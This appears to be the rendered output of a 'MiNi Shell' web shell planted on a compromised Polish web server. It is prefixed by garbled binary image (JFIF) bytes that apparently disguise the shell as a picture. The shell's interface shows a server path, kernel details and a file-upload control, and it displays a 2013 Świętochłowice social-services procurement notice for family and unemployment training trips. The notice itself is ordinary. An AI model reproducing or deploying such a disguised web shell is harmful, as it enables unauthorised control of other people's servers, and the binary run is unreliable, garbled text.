JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131106/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131106/451946-N-2013.html

<p class="kh_header"><b>Świętochłowice: organizacja iprzeprowadzenie dwóch wyjazdowych treningów kompetencji i umiejętności społecznych dla uczestnikó/ uczestniczek Projektu Kompas - w podziale na 2 zadania</b><br>
<b>Numer ogłoszenia: 451946 - 2013; data zamieszczenia: 06.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Katowicka 35, 41-600 Świętochłowice, woj. śląskie, tel. 032 2455104, faks 032 2455104.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ops-sw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> organizacja iprzeprowadzenie dwóch wyjazdowych treningów kompetencji i umiejętności społecznych dla uczestnikó/ uczestniczek Projektu Kompas - w podziale na 2 zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZADANIE NR 1:
Rodzinny trening psychologiczno- terapeutyczny dla 11 osób dorosłych i 14 dzieci

ZADANIE NR 2: Trening dla osób bezrobotnych dla 34 osób.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 55.00.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 08.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia
o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 5 do SIWZ,
oraz w przypadku zadania nr 2 - oświadczenia o wpisie do Rejestru Instytucji Szkoleniowych, zgodnie z załącznikiem nr 7  do SIWZ, na zasadzie spełnia - nie spełnia,
( przed podpisaniem umowy - Wybrany Wykonawca dostarczy Zamawiającemu wpis do Rejestru Instytucji Szkoleniowych, aktualny na rok 2013 ),</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu  dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 5 do SIWZ,  na zasadzie spełnia - nie spełnia,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu  dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 5 do SIWZ, na zasadzie spełnia - nie spełnia,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie :
- wykazu osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych  za świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia, i wykształcenia niezbędnych do wykonania zamówienia,
a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie  do dysponowania tymi osobami,- załącznik nr 8 do SIWZ, 
- oświadczenia, że osoby które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - załącznik nr 9 do SIWZ, na zasadzie spełnia - nie spełnia,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu  dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 5 do SIWZ,  na zasadzie spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ops-sw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Świętochłowice, ul. Katowicka 35, pokój 304.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.11.2013 godzina 09:00, miejsce: Świętochłowice, ul. Katowicka 35, pokój 304.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt pod nazwą KOMPAS - Kompleksowy program przeciwdziałania wykluczeniu społecznemu w Świętochłowicach, współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego oraz z budżetu państwa w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013. Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój
i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rodzinny trening psychologiczno- terapeutyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia dla zadania nr 1 
Rodzinny trening psychologiczno- terapeutyczny

1.	Zakres tematyczny treningu obejmuje :
a) moduł pracy z rodzicami :
- rola rodziców w życiu dziecka,
- potrzeby dzieci i sposoby ich zaspokajania,
- na kogo wyrośnie dziecko i od czego zależy jego pomyślność,
- organizacja czasu spędzanego z dzieckiem,
- jak pomóc dziecku, by radziło sobie z własnymi uczuciami, 
- jak zachęcić dziecko do współpracy,
- jak zachęcić dziecko do samodzielności,
- samodyscyplina zamiast kary,
- pochwała - czy jest istotna w życiu dziecka,
- jakie problemy mogą mieć dzieci i gdzie mogą szukać pomocy, 
b) moduł pracy z rodzicami i dziećmi :
- gry i zabawy psychologiczne.
2.	Trening powinien odbywać się w dwa weekendy ( wyjazd w piątek ok. godz. 14;00, powrót
w niedzielę ok. godz. 20;00), tj.:
a)	29 listopada - 01 grudnia 2013 r.,
b)	06 grudnia - 08 grudnia 2013 r.
 ( Wskazane terminy Zamawiający uznaje za preferencyjne i umożliwia ich zmianę tylko po uzgodnieniu z Zamawiającym).
3.	Miejscem odbywania treningów powinien być komfortowy hotel  minimum 3-gwiazdkowy
w  miejscowości usytułowanej  na Podbeskidziu lub Jurze Krakowsko -Częstochowskiej, zapewniający  :
a)	salę/ sale szkoleniowe i wyposażenie dydaktyczne, odpowiadające obowiązującemu stanowi prawnemu i poziomowi techniki ( tj.: tablicę, rzutnik, komputer, sprzęt audio- wizualny),
b)	miejsce/ miejsca do spędzania czasu wolnego w ramach zajęć integracyjnych,
c)	miejsca do zabaw i spędzania czasu dla dzieci ( w pomieszczeniach i na wolnym powietrzu),
d)	miejsce spożywania posiłków,
e)	miejsca noclegowe.
4.	Zajęcia treningowe, zakwaterowanie  oraz wyżywienie musi być zapewnione w ramach jednego obiektu.
5.	W treningu przewiduje się udział 11 osób dorosłych - rodziców wraz z 14 dziećmi, w tym :
- 1 dziecko - w wieku 7 m- cy,
- 2 dzieci - w wieku 3 lat,
- 2 dzieci - w wieku 4 lat,
- 5 dzieci - w wieku 5 lat,
- 1 dziecko - w wieku 6 lat,
- 1 dziecko - w wieku 7 lat, 
- 1 dziecko - w wieku 9 lat, 
- 1 dziecko - w wieku 12 lat. 
6.	W przypadku, gdy wystąpi okoliczność, że zbędnym lub niemożliwym stanie się przeprowadzenie treningu dla wskazanej liczby osób, Zamawiający zastrzega sobie prawo zmniejszenia liczby osób skierowanych na trening 
7.	Trening obejmuje dwa wyjazdy po minimum 15 godzin treningowych każdy (liczonych jako 45- minutowe godziny lekcyjne z 15- minutowymi przerwami kawowymi ), prowadzonych przez trenera : psychologa lub psychoterapeutę,  posiadającego wykształcenie wyższe- psychologiczne.
8.	Treningi powinny być prowadzone przez osoby posiadające odpowiednie uprawnienia, kwalifikacje oraz  doświadczenie w zakresie tematyki  prowadzonych zajęć, w tym w realizacji projektów podobnego rodzaju i wielkości.
9.	W czasie odbywania zajęć, Wykonawca zapewni w sposób dostosowany do wieku dzieci sprawowaną przez doświadczoną kadrę opiekę nad dziećmi uczestniczek/ uczestników.
10.	Zamawiający wymaga, aby opiekę nad 14 dziećmi uczestników/ uczestniczek sprawowało
minimum 2 opiekunów, posiadających odpowiednie uprawnienia, kwalifikacje oraz doświadczenie w zakresie tematyki prowadzonych zajęć.
11.	Wraz z opieką nad dziećmi powinny być zorganizowane dodatkowe atrakcje, uwzględniające aktualne warunki atmosferyczne (np.: zabawy ruchowe na powietrzu, spacer, zajęcia plastyczne, zabawy ruchowe w pomieszczeniach zadaszonych).
12.	Wymagana ilość kadry na grupę wyjazdową, to:
- kierownik- opiekun wyjazdu, odpowiadający za sprawy organizacyjne,
- trener grupy: psycholog lub psychoterapeuta - prowadzenie zajęć w zakresie treningu kompetencji i umiejętności społecznych w liczbie umożliwiającej przeprowadzenie niezbędnej ilości zajęć,
- opiekun/ opiekunka  do dzieci - zgodnie z wymaganiami Zamawiającego ( pkt 4 i 5 niniejszego załącznika)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 55.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 08.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Trening dla osób bezrobotnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia dla zadania nr 2 
Trening dla osób bezrobotnych

1.	Zakres tematyczny treningu obejmuje :
a)	asertywność,
b)	radzenie sobie ze stresem,
c)	komunikacja interpersonalna,
d)	aktywne poszukiwanie pracy,
e)	skuteczne radzenie sobie w sytuacjach trudnych,
f)	rozmowa kwalifikacyjna,
g)	zaktywizowanie potencjału zawodowego,
h)	pobudzenie do działania,
i)	nabycie umiejętności przydatnych w przyszłej pracy
j)	poznanie swoich mocnych i słabych stron,
k)	stworzenie planów na przyszłość,
l)	polepszenie kompetencji komunikacyjnych,
m)	umiejętność zarządzania czasem.
2.	Trening powinien odbywać się w dwa weekendy ( wyjazd w piątek ok. godz. 14:00, powrót
w niedzielę ok. godz. 20:00), tj.:
a)	29 listopada - 01 grudnia 2013 r.,
b)	06 grudnia - 08 grudnia 2013 r.
 ( Wskazane terminy Zamawiający uznaje za preferencyjne i umożliwia ich zmianę tylko po uzgodnieniu z Zamawiającym).
3.	Miejscem odbywania treningów powinien być komfortowy hotel to minimum 3-gwiazdkowy
w  miejscowości usytułowanej  na Podbeskidziu lub Jurze Krakowsko -Częstochowskiej, zapewniający  :
a)	salę/ sale szkoleniowe i wyposażenie dydaktyczne, odpowiadające obowiązującemu stanowi prawnemu i poziomowi techniki ( tj.: tablicę, rzutnik, komputer, sprzęt audio- wizualny),
b)	miejsce/ miejsca do spędzania czasu wolnego w ramach zajęć integracyjnych,
c)	miejsce spożywania posiłków,
d)	miejsca noclegowe.
4.	Zajęcia treningowe, zakwaterowanie  oraz wyżywienie musi być zapewnione w ramach jednego obiektu.
5.	W treningu przewiduje się udział  34 osób dorosłych.
6.	W przypadku, gdy wystąpi okoliczność, że zbędnym lub niemożliwym stanie się przeprowadzenie treningu dla wskazanej liczby osób, Zamawiający zastrzega sobie prawo zmniejszenia liczby osób skierowanych na trening.
7.	Trening obejmuje dwa wyjazdy po minimum piętnaście godzin treningowych każdy
( liczonych jako 45- minutowe godziny lekcyjne z 15- minutowymi przerwami kawowymi), prowadzone przez trenera: trenera pracy lub doradcę zawodowego, posiadającego wykształcenie wyższe na kierunku pedagogika, psychologia lub socjologia.
8.	Treningi powinny być prowadzone przez osoby posiadające odpowiednie uprawnienia, kwalifikacje oraz  doświadczenie w zakresie tematyki  prowadzonych zajęć, w tym w realizacji projektów podobnego rodzaju i wielkości.
9.	Zajęcia powinny odbywać się w 2 grupach, z których każda powinna mieć zapewnionego trenera grupy: trenera pracy lub doradcę zawodowego.
10.	Wymagana ilość kadry przypadającej na  jedną grupę wyjazdową, to:
- kierownik : opiekun wyjazdu, odpowiadający za sprawy organizacyjne,
- trener grupy : trener pracy lub doradca zawodowy - prowadzenie zajęć w zakresie treningu kompetencji i umiejętności społecznych.
11.	Zakwaterowanie powinno być zapewnione w pokojach 2 lub 3 osobowych z łazienkami ( pełny węzeł sanitarny).
12.	Uczestnicy/ uczestniczki powinni zostać zakwaterowani ze względu na płeć, a w przypadku nieparzystej liczby osób zapewniony zostanie dodatkowo pokój jednoosobowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 55.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 08.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com